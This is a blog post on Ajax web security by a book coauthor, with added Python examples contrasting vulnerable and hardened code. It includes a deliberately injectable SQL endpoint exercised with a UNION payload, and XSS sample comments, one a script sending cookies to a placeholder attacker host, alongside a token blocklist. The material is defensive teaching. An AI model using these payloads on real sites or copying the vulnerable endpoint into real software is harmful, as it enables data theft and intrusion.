Is Ajax insecure?
Well, with the book promotion of Ajax In Action at JavaRanch, the question that kept popping up was: "What about security?" The truth is that yes, some Ajax applications are wide open to attack. The reason: way too much business logic on the client and poorly implemented design on the server.
When we look at any web application we do a few things. We check where the data is coming from. We look for SQL injection. We look for JavaScript injection (cross-site scripting) wherever we redisplay that data.
Now we need to apply these same tests to Ajax. We are still posting data to the server, and the server's business logic still handles it. We should ALWAYS handle the business logic ON THE SERVER. I need to stress this since this is the only way you can secure your application. Let the server build the queries or decide which stored procedures to call. Some applications out there push this onto the client, and then you are looking for trouble: you are handing the attacker your column names and table names. Not a good thing!
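Here is what that difference looks like in code. This is an added example, not code from the post or from Ajax In Action: a search endpoint written two ways against a constructed SQLite table (the products table, its columns and rows are invented for the demo). The first version lets the page's JavaScript send a ready-made WHERE clause, so the client knows the schema and can ask for any column; the second accepts only a column choice checked against a server-side whitelist plus a value that is bound as a parameter.

```python
import sqlite3


# Constructed sample table; the column names and rows are invented for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER, name TEXT, price REAL, internal_cost REAL)"
    )
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?, ?)",
        [(1, "Widget", 9.99, 4.0), (2, "Gadget", 19.99, 11.5)],
    )
    return conn


def vulnerable_search(conn, params):
    """Endpoint that lets the client's JavaScript send a ready-made WHERE clause,
    e.g. {"where": "name = 'Widget'"}. Whatever arrives is pasted into the SQL,
    so the client effectively builds the query and has to know the schema."""
    sql = "SELECT id, name, price FROM products WHERE " + params["where"]
    return conn.execute(sql).fetchall()


# Only these columns may be searched; anything else is refused on the server.
SEARCHABLE_COLUMNS = {"name", "price"}


def hardened_search(conn, params):
    """Endpoint that takes only a column choice and a value, e.g.
    {"column": "name", "value": "Widget"}. The column name is checked against a
    server-side whitelist (never interpolated from free text) and the value is
    bound as a query parameter, so quotes in it are data, not SQL."""
    column = params.get("column")
    if column not in SEARCHABLE_COLUMNS:
        raise ValueError("unknown search column")
    value = params.get("value", "")
    if not isinstance(value, str) or len(value) > 100:
        raise ValueError("bad search value")
    sql = f"SELECT id, name, price FROM products WHERE {column} = ?"
    return conn.execute(sql, (value,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # A client that has been told the schema can ask for columns it should never see.
    leak = vulnerable_search(
        db, {"where": "1=1 UNION SELECT id, name, internal_cost FROM products"}
    )
    print("vulnerable endpoint returned:", leak)
    # The same trick against the hardened endpoint is just an unmatched string.
    print("hardened endpoint returned:",
          hardened_search(db, {"column": "name", "value": "' OR 1=1 --"}))
```

Note that the hardened version still uses an f-string for the column name; that is safe only because the name was taken from a fixed set on the server, which is the whole point of the rule above.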
An article that people may like is on MSDN: http://msdn.microsoft.com/msdnmag/issues/04/09/SQLInjection/default.aspx?side=true#a. It gives a quick overview of how a person can go about SQL injection. With JavaScript injection you need to look at all of the event handlers, JavaScript keywords, script tags, and so on, in anything you echo back into the page. If you allow public comments or the like, this can cause some trouble. Read the story about the Samy worm on MySpace here: http://www.ajaxian.com/archives/2005/10/sammy_uses_ajax.html. With a little JavaScript, it caused a big problem for MySpace.
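To show why "look at all of the event handlers" is harder than it sounds, here is an added example (not from the post) using a few constructed comment bodies. A blocklist that scans for known tokens catches the obvious script tag and onerror handler but lets an onmouseover handler straight through, because the list never ends; encoding the comment when it is written back into the page neutralises all of them at once. The comment strings are invented for the demo.

```python
import html
import re

# Constructed comment bodies, as a user might post them; not from the original post.
COMMENTS = [
    "Great book, the chapter on XMLHttpRequest helped a lot.",
    "<script>document.location='http://evil.example/?c='+document.cookie</script>",
    '<img src="x" onerror="alert(document.cookie)">',
    '<svg onmouseover="alert(1)">hover me</svg>',
]

# Approach 1: scan for tokens we know are dangerous and reject the comment.
DANGEROUS = re.compile(r"<script|onerror|onload|onclick|javascript:", re.IGNORECASE)


def passes_blocklist(comment):
    """True if none of the listed tokens appear. Any handler or construct that is
    not on the list (browsers support dozens of on* attributes) slips through."""
    return DANGEROUS.search(comment) is None


# Approach 2: keep the text as posted but encode it when it goes back into the page.
def render_comment(comment):
    """Escape <, >, &, " and ' so the browser displays the characters instead of
    parsing them as markup. Works regardless of which tag or handler was used."""
    return "<li>" + html.escape(comment, quote=True) + "</li>"


def contains_markup(rendered):
    """Check: does the user-supplied part of the rendered output still contain a
    tag or attribute delimiter? Only the fixed <li> wrapper may contain '<'."""
    body = rendered[len("<li>"):-len("</li>")]
    return "<" in body or ">" in body or '"' in body


if __name__ == "__main__":
    for c in COMMENTS:
        blocked = not passes_blocklist(c)
        leaked = contains_markup(render_comment(c))
        print(f"blocklist caught it: {blocked!s:5}  markup left after escaping: {leaked!s:5}  {c[:40]}")
```

The third and fourth comments are the instructive ones: the img/onerror payload trips the blocklist, the svg/onmouseover payload does not, and after escaping neither survives as markup. Filtering input is still worth doing for things like length and character set, but output encoding is the control that actually stops JavaScript injection.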
If you think that Ajax is insecure but your classic postback forms are safe, think again. Anyone can easily change a form submission on a normal framework and cause havoc. I have written about it in the past on my blog: http://radio.javaranch.com/pascarello/2004/04/28/1083160143000.html. After looking at the links in that post, you can see that any application is vulnerable to attack.
Eric's Rules of Thumb for Ajax Security:
- If you use user authentication, check for it on every request the Ajax endpoint handles, not just on the page that loaded the script!
- Check for SQL injection
- Check for JavaScript injection (cross-site scripting)
- Keep the Business Logic on the server!
- Don't assume every request is real! It may not have come from your page at all.
- Validate the data on the server; client-side validation is only a convenience for the user
- Look at the request's headers and make sure they are what you expect (the client controls them, so treat this as a sanity check, not as authentication)
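The rules above applied to one request, as an added example that is not from the post. It assumes a hypothetical "add to cart" Ajax endpoint and a hypothetical in-memory session store; the session id, anti-forgery token and request contents are constructed. The function checks, in order, that the session exists for this request, that the body carries the token tied to that session (so a forged cross-site request cannot pass), that the headers look like the page's own XMLHttpRequest code sent them, and that the data is valid on the server regardless of what the form did on the client.

```python
import hmac

# Hypothetical in-memory session store, constructed for the example; a real
# application would consult its own session mechanism here.
SESSIONS = {
    "sess-alice": {"user": "alice", "csrf_token": "a3f9c2e1d4b8"},
}

MAX_QUANTITY = 99


def check_ajax_request(request):
    """Apply the rules of thumb to one request for a hypothetical add-to-cart endpoint.
    `request` is a plain dict: {"cookies": {...}, "headers": {...}, "body": {...}}.
    Returns (accepted, detail); detail is the user name on success, else the reason."""
    # Rule: authentication is checked on this request, not only on the page that
    # loaded the JavaScript.
    session = SESSIONS.get(request["cookies"].get("SESSIONID"))
    if session is None:
        return False, "not authenticated"

    # Rule: don't assume the request is real. A token tied to the session must be
    # echoed in the body; a request forged from another site cannot know it.
    # Compared in constant time so the check does not leak the token byte by byte.
    sent_token = request["body"].get("csrf_token", "")
    if not isinstance(sent_token, str) or not hmac.compare_digest(
        sent_token.encode(), session["csrf_token"].encode()
    ):
        return False, "missing or wrong anti-forgery token"

    # Rule: look at the headers. They are set by the client, so this only filters
    # out sloppy or accidental requests (e.g. a plain HTML form post); it is not
    # authentication and must not replace the token check above.
    headers = {k.lower(): v for k, v in request["headers"].items()}
    if headers.get("x-requested-with") != "XMLHttpRequest":
        return False, "not sent by the page's XMLHttpRequest code"
    if headers.get("content-type", "").split(";")[0].strip() != "application/json":
        return False, "unexpected content type"

    # Rule: validate the data on the server; the client-side form check is advisory.
    quantity = request["body"].get("quantity")
    if (isinstance(quantity, bool) or not isinstance(quantity, int)
            or not 1 <= quantity <= MAX_QUANTITY):
        return False, f"quantity must be an integer between 1 and {MAX_QUANTITY}"
    product_id = request["body"].get("product_id", "")
    if not (isinstance(product_id, str) and product_id.isalnum() and len(product_id) <= 20):
        return False, "bad product id"

    return True, session["user"]


def good_request():
    """A request the page's own JavaScript would send; constructed sample."""
    return {
        "cookies": {"SESSIONID": "sess-alice"},
        "headers": {
            "X-Requested-With": "XMLHttpRequest",
            "Content-Type": "application/json; charset=utf-8",
        },
        "body": {"csrf_token": "a3f9c2e1d4b8", "product_id": "SKU42", "quantity": 3},
    }


if __name__ == "__main__":
    print(check_ajax_request(good_request()))
    forged = good_request()
    forged["body"]["csrf_token"] = "guess"
    print(check_ajax_request(forged))
```

The order matters: the cheap, fail-closed checks (session, token) run before anything touches business logic, and the header checks are deliberately placed after the token check so that nobody mistakes them for the thing keeping the endpoint safe.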
Applying common sense when programming an Ajax application will keep you and your data safe.
Eric Pascarello
Coauthor of Ajax In Action
Author of: JavaScript: Your Visual Blueprint for Dynamic Web Pages
Moderator of HTML/JavaScript at www.JavaRanch.com